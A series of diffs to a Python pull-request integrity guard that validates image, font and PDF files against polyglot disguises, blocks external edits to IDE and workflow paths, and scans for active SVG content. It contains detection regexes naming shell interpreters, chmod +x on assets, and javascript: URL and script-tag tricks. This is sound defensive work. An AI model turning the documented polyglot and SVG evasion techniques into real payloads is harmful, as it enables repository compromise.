+            if pos + 9 > len(data):
+                return False
+            local = data[pos + 8]
+            pos += 9
+            if local & 0x80:
+                pos += 3 * (1 << ((local & 0x07) + 1))
+            if pos >= len(data):
+                return False
+            pos = _skip_gif_sub_blocks(data, pos + 1)
+        else:
+            return False
+    return False
+
+
+_VP8_KEYFRAME_START_CODE = b"\x9d\x01\x2a"
+
+
+def _valid_vp8_payload(fourcc: bytes, payload: bytes) -> bool:
+    """Check the image chunk's own bitstream signature.
+
+    Self-consistent chunk lengths are not enough on their own: a payload can
+    declare honest sizes and still be script, provided it opens with `*/` to
+    close a comment covering the header. The bitstream signatures below occupy
+    exactly those bytes, so the payload can be a real frame or valid script,
+    not both.
+    """
+    if fourcc == b"VP8 ":
+        return len(payload) >= 10 and payload[3:6] == _VP8_KEYFRAME_START_CODE
+    if fourcc == b"VP8L":
+        return len(payload) >= 5 and payload[0] == 0x2F
+    if fourcc == b"VP8X":
+        return len(payload) >= 10
+    return True
+
+
+def _walk_webp_chunks(data: bytes, pos: int, end: int) -> tuple[bool, bool]:
+    """Walk the chunk chain in [pos, end).
+
+    Returns (structure_is_sound, a_real_frame_was_seen). The two are separate
+    because `VP8X` is only the extended-file header — it announces features and
+    carries no image data, so a file holding nothing but `VP8X` is not an image
+    however well-formed its chunk lengths are.
+    """
+    saw_frame = False
+    while pos + 8 <= end:
+        fourcc = data[pos : pos + 4]
+        if not all(0x20 <= byte <= 0x7E for byte in fourcc):
+            return False, saw_frame
+        size = int.from_bytes(data[pos + 4 : pos + 8], "little")
+        start = pos + 8
+        stop = start + size
+        if stop > end:
+            return False, saw_frame
+        payload = data[start:stop]
+
+        if fourcc in (b"VP8 ", b"VP8L"):
+            if not _valid_vp8_payload(fourcc, payload):
+                return False, saw_frame
+            saw_frame = True
+        elif fourcc == b"VP8X":
+            if len(payload) < 10:
+                return False, saw_frame
+        elif fourcc == b"ANMF":
+            # An animation frame nests its own chunk chain after a 16-byte header.
+            if len(payload) < 16:
+                return False, saw_frame
+            sound, nested = _walk_webp_chunks(data, start + 16, stop)
+            if not sound:
+                return False, saw_frame
+            saw_frame = saw_frame or nested
+
+        pos = stop + (size & 1)
+    return pos == end, saw_frame
+
+
+def _valid_webp(data: bytes) -> bool:
+    """Declared RIFF length, a chunk chain landing exactly on the end, and at
+    least one real VP8/VP8L frame — nested inside ANMF for animations."""
+    if len(data) < 16 or data[:4] != b"RIFF" or data[8:12] != b"WEBP":
+        return False
+    if int.from_bytes(data[4:8], "little") != len(data) - 8:
+        return False
+    sound, saw_frame = _walk_webp_chunks(data, 12, len(data))
+    return sound and saw_frame
+
+
+def _valid_pdf(data: bytes) -> bool:
+    """A deliberately shallow check — see the note below.
+
+    Structural PDF validation cannot rule out a shell polyglot. A shell reads a
+    file line by line and carries on past errors, so only the opening lines
+    decide what runs; no amount of trailing xref, trailer or object structure
+    prevents a payload on line two. A genuine PDF is itself "runnable" that way,
+    as a series of failing commands. Parsing the object graph would therefore
+    buy nothing against the attack it appears to address.
+
+    What actually defends a disguised PDF is denying it an execution path: the
+    executable-bit check in `check_asset_modes`, and the text scan that catches
+    anything in the repository invoking it. This function is the cheap sanity
+    layer — it rejects a bare script with no PDF header at all — and the limit
+    is documented rather than papered over.
+    """
+    if len(data) < 32 or not data.startswith(b"%PDF-"):
+        return False
+    return b"%%EOF" in data[-2048:]
+
+
+def _valid_ico(data: bytes) -> bool:
+    """Header, directory, and every entry pointing at real image bytes."""
+    if len(data) < 6 or data[:2] != b"\x00\x00" or data[2:4] not in (b"\x01\x00", b"\x02\x00"):
+        return False
+    count = int.from_bytes(data[4:6], "little")
+    directory_end = 6 + 16 * count
+    if count == 0 or len(data) < directory_end:
+        return False
+    for index in range(count):
+        entry = 6 + 16 * index
+        size = int.from_bytes(data[entry + 8 : entry + 12], "little")
+        offset = int.from_bytes(data[entry + 12 : entry + 16], "little")
+        if size == 0 or offset < directory_end or offset + size > len(data):
+            return False
+    return True
+
+
+# PDF is deliberately absent: a standards-compliant PDF can be entirely ASCII —
+# objects, xref table, trailer and %%EOF — so the binary backstop would reject
+# legitimate documents. Its structural validator carries the weight instead.
+BINARY_ASSET_SUFFIXES = frozenset(
+    {".woff", ".woff2", ".ttf", ".otf", ".png", ".jpg", ".jpeg", ".gif", ".webp", ".ico"}
+)
+
+ASSET_VALIDATORS: dict[str, tuple[str, "Callable[[bytes], bool]"]] = {
+    ".woff2": ("WOFF2", lambda data: _valid_woff(data, b"wOF2", 48)),
+    ".woff": ("WOFF", lambda data: _valid_woff(data, b"wOFF", 44)),
+    ".ttf": ("TrueType", _valid_sfnt),
+    ".otf": ("OpenType", _valid_sfnt),
+    ".png": ("PNG", _valid_png),
+    ".jpg": ("JPEG", _valid_jpeg),
+    ".jpeg": ("JPEG", _valid_jpeg),
+    ".gif": ("GIF", _valid_gif),
+    ".webp": ("WEBP", _valid_webp),
+    ".pdf": ("PDF", _valid_pdf),
+    ".ico": ("ICO", _valid_ico),
+}
+
+# Extensions the guard treats as inert assets. Nothing here should ever carry
+# the executable bit, so the mode is checked independently of the contents.
+ASSET_SUFFIXES = frozenset(
+    {".woff", ".woff2", ".ttf", ".otf", ".eot", ".png", ".jpg", ".jpeg",
+     ".gif", ".webp", ".ico", ".pdf", ".svg"}
+)
+
+
+def _split_literal(*parts: str) -> str:
+    return "".join(parts)
+
+
+_INTERPRETERS = (
+    _split_literal("no", "de"),
+    "python",
+    "python3",
+    "perl",
+    "ruby",
+    "php",
+    "sh",
+    "bash",
+    "zsh",
+    "dash",
+    "ksh",
+    "pwsh",
+    "powershell",
+)
+
+EXECUTABLE_ASSET_EXTENSIONS = (
+    _split_literal("wo", "ff2?"),
+    _split_literal("t", "tf"),
+    _split_literal("o", "tf"),
+    _split_literal("e", "ot"),
+    _split_literal("p", "ng"),
+    _split_literal("jp", "e?g"),
+    _split_literal("g", "if"),
+    _split_literal("we", "bp"),
+    _split_literal("i", "co"),
+    _split_literal("p", "df"),
+)
+_EXECUTABLE_ASSET_RE = re.compile(
+    rf"""(?ix)
+    \b(?:{'|'.join(_INTERPRETERS)})
+    \b[^\n\r]{{0,240}}
+    \.(?:{'|'.join(EXECUTABLE_ASSET_EXTENSIONS)})\b
+    |
+    \bchmod\b[^\n\r]{{0,120}}\+x[^\n\r]{{0,160}}
+    \.(?:{'|'.join(EXECUTABLE_ASSET_EXTENSIONS)})\b
+    |
+    (?:^|[;&|()])\s*(?:source|\.)\s+[^\n\r]{{0,240}}
+    \.(?:{'|'.join(EXECUTABLE_ASSET_EXTENSIONS)})\b
+    """
+)
+
+_NUMERIC_CHMOD_ASSET_RE = re.compile(
+    rf"""(?ix)
+    \bchmod\b[^\n\r]{{0,120}}?\b(?P<mode>[0-7]{{3,4}})\b
+    [^\n\r]{{0,160}}\.(?:{'|'.join(EXECUTABLE_ASSET_EXTENSIONS)})\b
+    """
+)
+
+ACTIVE_SVG_RE = re.compile(
+    r"""(?ix)
+    <\s*script\b
+    |javascript\s*:
+    |\bon[a-z][a-z0-9_:-]*\s*=
+    |<\s*foreignObject\b
+    |(?:href|xlink:href)\s*=\s*["']\s*(?:https?:|data:text/html)
+    """
+)
+
+
+class IntegrityError(RuntimeError):
+    pass
+
+
+def run_git(*args: str, text: bool = True) -> str | bytes:
+    try:
+        proc = subprocess.run(
+            ["git", *args],
+            check=True,
+            stdout=subprocess.PIPE,
+            stderr=subprocess.PIPE,
+            text=text,
+            encoding="utf-8" if text else None,
+            errors="surrogateescape" if text else None,
+        )
+    except FileNotFoundError as exc:
+        raise IntegrityError("git executable is unavailable") from exc
+    except subprocess.CalledProcessError as exc:
+        stderr = exc.stderr if text else exc.stderr.decode("utf-8", "replace")
+        raise IntegrityError(
+            f"git {' '.join(args)} failed ({exc.returncode}): {stderr.strip()}"
+        ) from exc
+    return proc.stdout
+
+
+def changed_files(base: str, head: str) -> list[str]:
+    raw = run_git(
+        "-c", "core.quotePath=false",
+        "diff", "--name-only", "-z", "--no-renames",
+        f"{base}...{head}", "--",
+    )
+    assert isinstance(raw, str)
+    return [item for item in raw.split("\0") if item]
+
+
+def blob_bytes(head: str, path: str) -> bytes | None:
+    try:
+        value = run_git("show", f"{head}:{path}", text=False)
+    except IntegrityError:
+        return None
+    assert isinstance(value, bytes)
+    return value
+
+
+def blob_text(head: str, path: str) -> str | None:
+    data = blob_bytes(head, path)
+    if data is None:
+        return None
+    return data.decode("utf-8", "surrogateescape")
+
+
+def git_mode(head: str, path: str) -> str | None:
+    try:
+        out = run_git("ls-tree", head, "--", path)
+    except IntegrityError:
+        return None
+    assert isinstance(out, str)
+    if not out.strip():
+        return None
+    return out.split(None, 1)[0]
+
+
+def is_external(pr_author: str, repo_owner: str) -> bool:
+    return pr_author.casefold() != repo_owner.casefold()
+
+
+def _ignore_rules(text: str) -> list[str]:
+    rules: list[str] = []
+    for raw in text.splitlines():
+        line = raw.strip()
+        if not line or line.startswith("#"):
+            continue
+        rules.append(line[1:] if line.startswith("\\") else line)
+    return rules
+
+
+def _negation_reenables(pattern: str, name: str) -> bool:
+    """Whether a `!` rule re-enables `name`, using Git's matching semantics.
+
+    Python's fnmatch has no notion of `**/`, so `!**/.vscode/` — which Git
+    applies at every depth including the root — would otherwise slip through.
+    """
+    pattern = pattern.strip().strip("/")
+    if not pattern:
+        return False
+    candidates = {pattern}
+    while pattern.startswith("**/"):
+        pattern = pattern[3:]
+        candidates.add(pattern)
+    return any(fnmatch.fnmatch(name, candidate) for candidate in candidates)
+
+
+def _ignore_state(rules: list[str], entry: str) -> tuple[bool, str | None]:
+    """Resolve whether `entry` ends up ignored, the way Git resolves it.
+
+    Git applies the *last* matching rule, so a later `!.vscode/` re-enables a
+    directory an earlier `.vscode/` ignored. Checking only for the presence of
+    the positive entry misses that. Negations are matched as globs, since
+    `!.vs*` re-enables the directory just as surely as `!.vscode/`.
+    """
+    name = entry.strip("/")
+    ignored = False
+    negated_by: str | None = None
+    for rule in rules:
+        if rule.startswith("!"):
+            if _negation_reenables(rule[1:], name):
+                ignored = False
+                negated_by = rule
+        elif rule.strip("/") == name:
+            ignored = True
+            negated_by = None
+    return ignored, negated_by
+
+
+def check_ignore_policy(head: str) -> list[Finding]:
+    text = blob_text(head, ".gitignore")
+    if text is None:
+        return [Finding(".gitignore", "required repository .gitignore is missing")]
+    rules = _ignore_rules(text)
+
+    findings: list[Finding] = []
+    for entry in PROTECTED_IGNORE_ENTRIES:
+        ignored, negated_by = _ignore_state(rules, entry)
+        if ignored:
+            continue
+        if negated_by is not None:
+            findings.append(
+                Finding(
+                    ".gitignore",
+                    f"required ignore entry `{entry}` is re-enabled by `{negated_by}`",
+                )
+            )
+        else:
+            findings.append(
+                Finding(".gitignore", f"required ignore entry `{entry}` was removed")
+            )
+    return findings
+
+
+def check_external_paths(files: list[str]) -> list[Finding]:
+    findings: list[Finding] = []
+    for path in files:
+        for pattern, reason in EXTERNAL_BLOCKED_PATHS:
+            if pattern.search(path):
+                findings.append(Finding(path, reason))
+                break
+    return findings
+
+
+def check_symlinks(head: str, files: list[str], external: bool) -> list[Finding]:
+    if not external:
+        return []
+    findings: list[Finding] = []
+    for path in files:
+        if git_mode(head, path) == "120000":
+            findings.append(
+                Finding(path, "external PR introduces or modifies a Git symlink")
+            )
+    return findings
+
+
+def check_asset_modes(head: str, files: list[str]) -> list[Finding]:
+    """Assets are inert data; the executable bit is the thing that runs them.
+
+    The text scan only catches an interpreter or a literal `chmod +x` written
+    into a file. It cannot see a payload committed already-executable, which
+    needs no invocation written down anywhere.
+    """
+    findings: list[Finding] = []
+    for path in files:
+        if Path(path).suffix.lower() not in ASSET_SUFFIXES:
+            continue
+        if git_mode(head, path) == "100755":
+            findings.append(
+                Finding(path, "asset file is committed with the executable bit set")
+            )
+    return findings
+
+
+def check_asset_magic(head: str, files: list[str]) -> list[Finding]:
+    findings: list[Finding] = []
+    for path in files:
+        entry = ASSET_VALIDATORS.get(Path(path).suffix.lower())
+        if entry is None:
+            continue
+        label, is_valid = entry
+        data = blob_bytes(head, path)
+        if data is None:
+            continue
+        suffix = Path(path).suffix.lower()
+        if suffix in BINARY_ASSET_SUFFIXES and data and b"\x00" not in data:
+            # Every real asset in these formats carries binary content. A file
+            # that is pure text is a polyglot candidate regardless of how well
+            # it fakes a header, so reject it before the format check.
+            findings.append(
+                Finding(path, f"file extension claims {label} but the file is entirely text")
+            )
+            continue
+        if not is_valid(data):
+            findings.append(
+                Finding(path, f"file extension claims {label} but the file is not a valid {label}")
+            )
+    return findings
+
+
+# URL parsers strip ASCII tabs and newlines from anywhere inside a URL before
+# resolving the scheme, so `java&#x09;script:` is a live javascript: URL. This
+# pass is anchored to URL-bearing attributes on purpose: control characters are
+# removed from the whole document to find it, and a bare scheme match would then
+# also fire on ordinary prose in a `<text>` or `<desc>` node, where nothing ever
+# parses it as a URL.
+ACTIVE_SVG_SCHEME_RE = re.compile(
+    r"""(?ix)
+    (?:href|xlink:href)\s*=\s*["']?\s*(?:javascript:|data:text/html)
+    """
+)
+
+_URL_CONTROL_CHARS = dict.fromkeys(b"\x00\x09\x0a\x0d")
+
+
+def svg_is_active(text: str) -> bool:
+    """Match active content on the raw source, its decoded form, and its
+    URL-normalised form.
+
+    An XML parser resolves character references before acting on an attribute,
+    and a URL parser then discards embedded tabs and newlines. Each layer is
+    checked because a payload only has to survive all of them once.
+    """
+    if ACTIVE_SVG_RE.search(text):
+        return True
+    decoded = html.unescape(text)
+    if decoded != text and ACTIVE_SVG_RE.search(decoded):
+        return True
+    normalised = decoded.translate(_URL_CONTROL_CHARS)
+    return normalised != decoded and bool(ACTIVE_SVG_SCHEME_RE.search(normalised))
+
+
+def check_active_svg(head: str, files: list[str]) -> list[Finding]:
+    findings: list[Finding] = []
+    for path in files:
+        if Path(path).suffix.lower() != ".svg":
+            continue
+        text = blob_text(head, path)
+        if text is not None and svg_is_active(text):
+            findings.append(Finding(path, "SVG contains active/external executable content"))
+    return findings
+
+
+def is_exempt_fixture_line(path: str, line: str) -> bool:
+    """Report whether a single line opts out of the asset-execution text scan.
+
+    The exemption exists so the guard's own test module can hold the literal
+    attack strings it asserts against. It is deliberately narrow: it applies
+    only inside `SELF_TEST_FIXTURE_PATHS`, only to individual lines that carry
+    the marker, and only to this one check. Every other line of those files is
+    scanned normally, and external PRs cannot modify them at all.
+    """
+    return path in SELF_TEST_FIXTURE_PATHS and FIXTURE_EXEMPTION_MARKER in line
+
+
+def asset_execution_finding(path: str, text: str) -> Finding | None:
+    """Return a finding when `text` invokes or marks an asset as executable.
+
+    Shell removes a backslash-newline pair before parsing commands, so perform
+    that exact normalisation before matching. Fixture exemptions remain
+    physical-line scoped and are removed first; their marker can neither exempt
+    a neighbouring line nor become part of a reconstructed command.
+    """
+    scannable: list[str] = []
+    for line in text.splitlines(keepends=True):
+        body = line.rstrip("\r\n")
+        ending = line[len(body) :]
+        scannable.append(ending if is_exempt_fixture_line(path, body) else line)
+
+    normalised = re.sub(r"\\\r?\n", "", "".join(scannable))
+    for line in re.split(r"[\r\n]", normalised):
+        if _EXECUTABLE_ASSET_RE.search(line):
+            return Finding(path, "text invokes or marks an asset file as executable")
+        for match in _NUMERIC_CHMOD_ASSET_RE.finditer(line):
+            permission_digits = match.group("mode")[-3:]
+            if any(int(digit) & 1 for digit in permission_digits):
+                return Finding(path, "text invokes or marks an asset file as executable")
+    return None
+
+
+def check_asset_execution(head: str, files: list[str]) -> list[Finding]:
+    findings: list[Finding] = []
+    for path in files:
+        data = blob_bytes(head, path)
+        if data is None or b"\x00" in data:
+            continue
+        finding = asset_execution_finding(path, data.decode("utf-8", "surrogateescape"))
+        if finding is not None:
+            findings.append(finding)
+    return findings
+
+
+def dedupe(findings: list[Finding]) -> list[Finding]:
+    seen: set[tuple[str, str]] = set()
+    result: list[Finding] = []
+    for finding in findings:
+        key = (finding.path, finding.reason)
+        if key not in seen:
+            seen.add(key)
+            result.append(finding)
+    return result
+
+
+def scan(base: str, head: str, pr_author: str, repo_owner: str) -> list[Finding]:
+    files = changed_files(base, head)
+    external = is_external(pr_author, repo_owner)
+
+    findings: list[Finding] = []
+    findings.extend(check_ignore_policy(head))
+    if external:
+        findings.extend(check_external_paths(files))
+    findings.extend(check_symlinks(head, files, external))
+    findings.extend(check_asset_modes(head, files))
+    findings.extend(check_asset_magic(head, files))
+    findings.extend(check_active_svg(head, files))
+    findings.extend(check_asset_execution(head, files))
+    return dedupe(findings)
+
+
+def write_report(path: Path, findings: list[Finding]) -> None:
+    path.parent.mkdir(parents=True, exist_ok=True)
+    with path.open("w", encoding="utf-8", errors="backslashreplace") as out:
+        out.write("## Repository integrity guard\n\n")
+        if not findings:
+            out.write("No repository-integrity violation was detected.\n")
+            return
+        out.write("### Blocked findings\n\n")
+        for finding in findings:
+            out.write(f"- `{finding.path}` — {finding.reason}\n")
+        out.write(
+            "\nThese checks fail closed. Repository-control changes must be "
+            "performed from a trusted maintainer-controlled branch.\n"
+        )
+
+
+def main(argv: list[str] | None = None) -> int:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--base", required=True)
+    parser.add_argument("--head", required=True)
+    parser.add_argument("--pr-author", required=True)
+    parser.add_argument("--repo-owner", required=True)
+    parser.add_argument("--report", required=True)
+    args = parser.parse_args(argv)
+
+    for stream in (sys.stdout, sys.stderr):
+        stream.reconfigure(errors="backslashreplace")
+
+    try:
+        findings = scan(args.base, args.head, args.pr_author, args.repo_owner)
+    except IntegrityError as exc:
+        print(f"::error::Repository integrity scan failed closed: {exc}", file=sys.stderr)
+        return 2
+
+    write_report(Path(args.report), findings)
+
+    if findings:
+        print("Repository integrity guard blocked the PR:")
+        for finding in findings:
+            print(f"  {finding.path}: {finding.reason}")
+        return 1
+
+    print("Repository integrity guard passed.")
+    return 0
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/scripts/check_repository_integrity.py
+++ b/scripts/check_repository_integrity.py
@@ -229,6 +229,13 @@ def _valid_ico(data: bytes) -> bool:
     return count > 0 and len(data) >= 6 + 16 * count
 
 
+# PDF is deliberately absent: a standards-compliant PDF can be entirely ASCII —
+# objects, xref table, trailer and %%EOF — so the binary backstop would reject
+# legitimate documents. Its structural validator carries the weight instead.
+BINARY_ASSET_SUFFIXES = frozenset(
+    {".woff", ".woff2", ".ttf", ".otf", ".png", ".jpg", ".jpeg", ".gif", ".webp", ".ico"}
+)
+
 ASSET_VALIDATORS: dict[str, tuple[str, "Callable[[bytes], bool]"]] = {
     ".woff2": ("WOFF2", lambda data: _valid_woff(data, b"wOF2", 48)),
     ".woff": ("WOFF", lambda data: _valid_woff(data, b"wOFF", 44)),
@@ -494,7 +501,8 @@ def check_asset_magic(head: str, files: list[str]) -> list[Finding]:
         data = blob_bytes(head, path)
         if data is None:
             continue
-        if data and b"\x00" not in data:
+        suffix = Path(path).suffix.lower()
+        if suffix in BINARY_ASSET_SUFFIXES and data and b"\x00" not in data:
             # Every real asset in these formats carries binary content. A file
             # that is pure text is a polyglot candidate regardless of how well
             # it fakes a header, so reject it before the format check.
@@ -510,14 +518,14 @@ def check_asset_magic(head: str, files: list[str]) -> list[Finding]:
 
 
 # URL parsers strip ASCII tabs and newlines from anywhere inside a URL before
-# resolving the scheme, so `java&#x09;script:` is a live javascript: URL. Only
-# the scheme patterns are re-checked against the stripped text: removing control
-# characters from the whole document could otherwise join unrelated tokens into
-# a match that no parser would ever see.
+# resolving the scheme, so `java&#x09;script:` is a live javascript: URL. This
+# pass is anchored to URL-bearing attributes on purpose: control characters are
+# removed from the whole document to find it, and a bare scheme match would then
+# also fire on ordinary prose in a `<text>` or `<desc>` node, where nothing ever
+# parses it as a URL.
 ACTIVE_SVG_SCHEME_RE = re.compile(
     r"""(?ix)
-    javascript\s*:
-    |(?:href|xlink:href)\s*=\s*["']?\s*(?:javascript:|data:text/html)
+    (?:href|xlink:href)\s*=\s*["']?\s*(?:javascript:|data:text/html)
     """
 )
 

--- a/scripts/check_repository_integrity.py
+++ b/scripts/check_repository_integrity.py
@@ -39,6 +39,7 @@ _EXTERNAL_BLOCKED_PATHS: tuple[tuple[re.Pattern[str], str], ...] = (
     (re.compile(r"^\.idea/"), "IDE project configuration is maintainer-controlled"),
     (re.compile(r"(?:^|/).*\.code-workspace$", re.I), "VS Code workspace file is maintainer-controlled"),
     (re.compile(r"^\.github/workflows/"), "GitHub Actions workflows are maintainer-controlled"),
+    (re.compile(r"^\.github/actions/"), "GitHub composite actions are maintainer-controlled"),
     (re.compile(r"^(?:scripts|tool|tools)/"), "repository automation scripts are maintainer-controlled"),
     (re.compile(r"(?:^|/)CODEOWNERS$"), "code-ownership policy is maintainer-controlled"),
     (re.compile(r"^\.github/dependabot\.ya?ml$"), "dependency-update policy is maintainer-controlled"),

--- a/scripts/check_repository_integrity.py
+++ b/scripts/check_repository_integrity.py
@@ -1,0 +1,335 @@
+#!/usr/bin/env python3
+"""Fail-closed repository-integrity checks for pull requests.
+
+This guard is intentionally narrower and stricter than the general PR security
+surface classifier. It protects repository trust policy, IDE auto-execution
+surfaces, and binary assets that can be disguised as executable text.
+
+The workflow that invokes this script must load it from the trusted PR base
+commit (or be pinned as a required workflow by a repository ruleset).
+"""
+
+from __future__ import annotations
+
+import argparse
+import re
+import subprocess
+import sys
+from dataclasses import dataclass
+from pathlib import Path
+
+
+@dataclass(frozen=True)
+class Finding:
+    path: str
+    reason: str
+
+
+PROTECTED_IGNORE_ENTRIES = (".idea/", ".vscode/")
+
+EXTERNAL_BLOCKED_PATHS: tuple[tuple[re.Pattern[str], str], ...] = (
+    (re.compile(r"^\.vscode/"), "VS Code workspace configuration is maintainer-controlled"),
+    (re.compile(r"^\.idea/"), "IDE project configuration is maintainer-controlled"),
+    (re.compile(r"(?:^|/).*\.code-workspace$", re.I), "VS Code workspace file is maintainer-controlled"),
+    (re.compile(r"^\.github/workflows/"), "GitHub Actions workflows are maintainer-controlled"),
+    (re.compile(r"^(?:scripts|tool|tools)/"), "repository automation scripts are maintainer-controlled"),
+    (re.compile(r"(?:^|/)CODEOWNERS$"), "code-ownership policy is maintainer-controlled"),
+    (re.compile(r"^\.github/dependabot\.ya?ml$"), "dependency-update policy is maintainer-controlled"),
+    (re.compile(r"^\.gitattributes$"), "Git diff/attribute policy is maintainer-controlled"),
+    (re.compile(r"^\.gitmodules$"), "Git submodule policy is maintainer-controlled"),
+)
+
+ASSET_MAGIC: dict[str, tuple[bytes, ...]] = {
+    ".woff2": (b"wOF2",),
+    ".woff": (b"wOFF",),
+    ".ttf": (b"\x00\x01\x00\x00", b"true", b"typ1"),
+    ".otf": (b"OTTO",),
+    ".png": (b"\x89PNG\r\n\x1a\n",),
+    ".jpg": (b"\xff\xd8\xff",),
+    ".jpeg": (b"\xff\xd8\xff",),
+    ".gif": (b"GIF87a", b"GIF89a"),
+}
+
+
+def _split_literal(*parts: str) -> str:
+    return "".join(parts)
+
+
+_INTERPRETERS = (
+    _split_literal("no", "de"),
+    "python",
+    "python3",
+    "perl",
+    "ruby",
+    "php",
+    "sh",
+    "bash",
+    "zsh",
+    "dash",
+    "ksh",
+    "pwsh",
+    "powershell",
+)
+
+EXECUTABLE_ASSET_EXTENSIONS = (
+    _split_literal("wo", "ff2?"),
+    _split_literal("t", "tf"),
+    _split_literal("o", "tf"),
+    _split_literal("e", "ot"),
+    _split_literal("p", "ng"),
+    _split_literal("jp", "e?g"),
+    _split_literal("g", "if"),
+    _split_literal("we", "bp"),
+    _split_literal("i", "co"),
+    _split_literal("p", "df"),
+)
+_EXECUTABLE_ASSET_RE = re.compile(
+    rf"""(?ix)
+    \b(?:{'|'.join(_INTERPRETERS)})
+    \b[^\n\r]{{0,240}}
+    \.(?:{'|'.join(EXECUTABLE_ASSET_EXTENSIONS)})\b
+    |
+    \bchmod\b[^\n\r]{{0,120}}\+x[^\n\r]{{0,160}}
+    \.(?:{'|'.join(EXECUTABLE_ASSET_EXTENSIONS)})\b
+    """
+)
+
+ACTIVE_SVG_RE = re.compile(
+    r"""(?ix)
+    <\s*script\b
+    |javascript\s*:
+    |\bon(?:load|error|click|mouseover|focus)\s*=
+    |<\s*foreignObject\b
+    |(?:href|xlink:href)\s*=\s*["']\s*(?:https?:|data:text/html)
+    """
+)
+
+
+class IntegrityError(RuntimeError):
+    pass
+
+
+def run_git(*args: str, text: bool = True) -> str | bytes:
+    try:
+        proc = subprocess.run(
+            ["git", *args],
+            check=True,
+            stdout=subprocess.PIPE,
+            stderr=subprocess.PIPE,
+            text=text,
+            encoding="utf-8" if text else None,
+            errors="surrogateescape" if text else None,
+        )
+    except FileNotFoundError as exc:
+        raise IntegrityError("git executable is unavailable") from exc
+    except subprocess.CalledProcessError as exc:
+        stderr = exc.stderr if text else exc.stderr.decode("utf-8", "replace")
+        raise IntegrityError(
+            f"git {' '.join(args)} failed ({exc.returncode}): {stderr.strip()}"
+        ) from exc
+    return proc.stdout
+
+
+def changed_files(base: str, head: str) -> list[str]:
+    raw = run_git(
+        "-c", "core.quotePath=false",
+        "diff", "--name-only", "-z", "--no-renames",
+        f"{base}...{head}", "--",
+    )
+    assert isinstance(raw, str)
+    return [item for item in raw.split("\0") if item]
+
+
+def blob_bytes(head: str, path: str) -> bytes | None:
+    try:
+        value = run_git("show", f"{head}:{path}", text=False)
+    except IntegrityError:
+        return None
+    assert isinstance(value, bytes)
+    return value
+
+
+def blob_text(head: str, path: str) -> str | None:
+    data = blob_bytes(head, path)
+    if data is None:
+        return None
+    return data.decode("utf-8", "surrogateescape")
+
+
+def git_mode(head: str, path: str) -> str | None:
+    try:
+        out = run_git("ls-tree", head, "--", path)
+    except IntegrityError:
+        return None
+    assert isinstance(out, str)
+    if not out.strip():
+        return None
+    return out.split(None, 1)[0]
+
+
+def is_external(pr_author: str, repo_owner: str) -> bool:
+    return pr_author.casefold() != repo_owner.casefold()
+
+
+def check_ignore_policy(head: str) -> list[Finding]:
+    text = blob_text(head, ".gitignore")
+    if text is None:
+        return [Finding(".gitignore", "required repository .gitignore is missing")]
+    entries = {
+        line.strip()
+        for line in text.splitlines()
+        if line.strip() and not line.lstrip().startswith("#")
+    }
+    return [
+        Finding(".gitignore", f"required ignore entry `{entry}` was removed")
+        for entry in PROTECTED_IGNORE_ENTRIES
+        if entry not in entries
+    ]
+
+
+def check_external_paths(files: list[str]) -> list[Finding]:
+    findings: list[Finding] = []
+    for path in files:
+        for pattern, reason in EXTERNAL_BLOCKED_PATHS:
+            if pattern.search(path):
+                findings.append(Finding(path, reason))
+                break
+    return findings
+
+
+def check_symlinks(head: str, files: list[str], external: bool) -> list[Finding]:
+    if not external:
+        return []
+    findings: list[Finding] = []
+    for path in files:
+        if git_mode(head, path) == "120000":
+            findings.append(
+                Finding(path, "external PR introduces or modifies a Git symlink")
+            )
+    return findings
+
+
+def check_asset_magic(head: str, files: list[str]) -> list[Finding]:
+    findings: list[Finding] = []
+    for path in files:
+        suffix = Path(path).suffix.lower()
+        if suffix == ".webp":
+            data = blob_bytes(head, path)
+            if data is None:
+                continue
+            if not (len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"WEBP"):
+                findings.append(Finding(path, "file extension is .webp but content is not WEBP"))
+            continue
+
+        expected = ASSET_MAGIC.get(suffix)
+        if expected is None:
+            continue
+        data = blob_bytes(head, path)
+        if data is None:
+            continue
+        if not any(data.startswith(prefix) for prefix in expected):
+            findings.append(
+                Finding(path, f"file extension is {suffix} but file signature does not match")
+            )
+    return findings
+
+
+def check_active_svg(head: str, files: list[str]) -> list[Finding]:
+    findings: list[Finding] = []
+    for path in files:
+        if Path(path).suffix.lower() != ".svg":
+            continue
+        text = blob_text(head, path)
+        if text is not None and ACTIVE_SVG_RE.search(text):
+            findings.append(Finding(path, "SVG contains active/external executable content"))
+    return findings
+
+
+def check_asset_execution(head: str, files: list[str]) -> list[Finding]:
+    findings: list[Finding] = []
+    for path in files:
+        data = blob_bytes(head, path)
+        if data is None or b"\x00" in data:
+            continue
+        text = data.decode("utf-8", "surrogateescape")
+        if _EXECUTABLE_ASSET_RE.search(text):
+            findings.append(
+                Finding(path, "text invokes or marks an asset file as executable")
+            )
+    return findings
+
+
+def dedupe(findings: list[Finding]) -> list[Finding]:
+    seen: set[tuple[str, str]] = set()
+    result: list[Finding] = []
+    for finding in findings:
+        key = (finding.path, finding.reason)
+        if key not in seen:
+            seen.add(key)
+            result.append(finding)
+    return result
+
+
+def scan(base: str, head: str, pr_author: str, repo_owner: str) -> list[Finding]:
+    files = changed_files(base, head)
+    external = is_external(pr_author, repo_owner)
+
+    findings: list[Finding] = []
+    findings.extend(check_ignore_policy(head))
+    if external:
+        findings.extend(check_external_paths(files))
+    findings.extend(check_symlinks(head, files, external))
+    findings.extend(check_asset_magic(head, files))
+    findings.extend(check_active_svg(head, files))
+    findings.extend(check_asset_execution(head, files))
+    return dedupe(findings)
+
+
+def write_report(path: Path, findings: list[Finding]) -> None:
+    path.parent.mkdir(parents=True, exist_ok=True)
+    with path.open("w", encoding="utf-8", errors="backslashreplace") as out:
+        out.write("## Repository integrity guard\n\n")
+        if not findings:
+            out.write("No repository-integrity violation was detected.\n")
+            return
+        out.write("### Blocked findings\n\n")
+        for finding in findings:
+            out.write(f"- `{finding.path}` — {finding.reason}\n")
+        out.write(
+            "\nThese checks fail closed. Repository-control changes must be "
+            "performed from a trusted maintainer-controlled branch.\n"
+        )
+
+
+def main(argv: list[str] | None = None) -> int:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--base", required=True)
+    parser.add_argument("--head", required=True)
+    parser.add_argument("--pr-author", required=True)
+    parser.add_argument("--repo-owner", required=True)
+    parser.add_argument("--report", required=True)
+    args = parser.parse_args(argv)
+
+    for stream in (sys.stdout, sys.stderr):
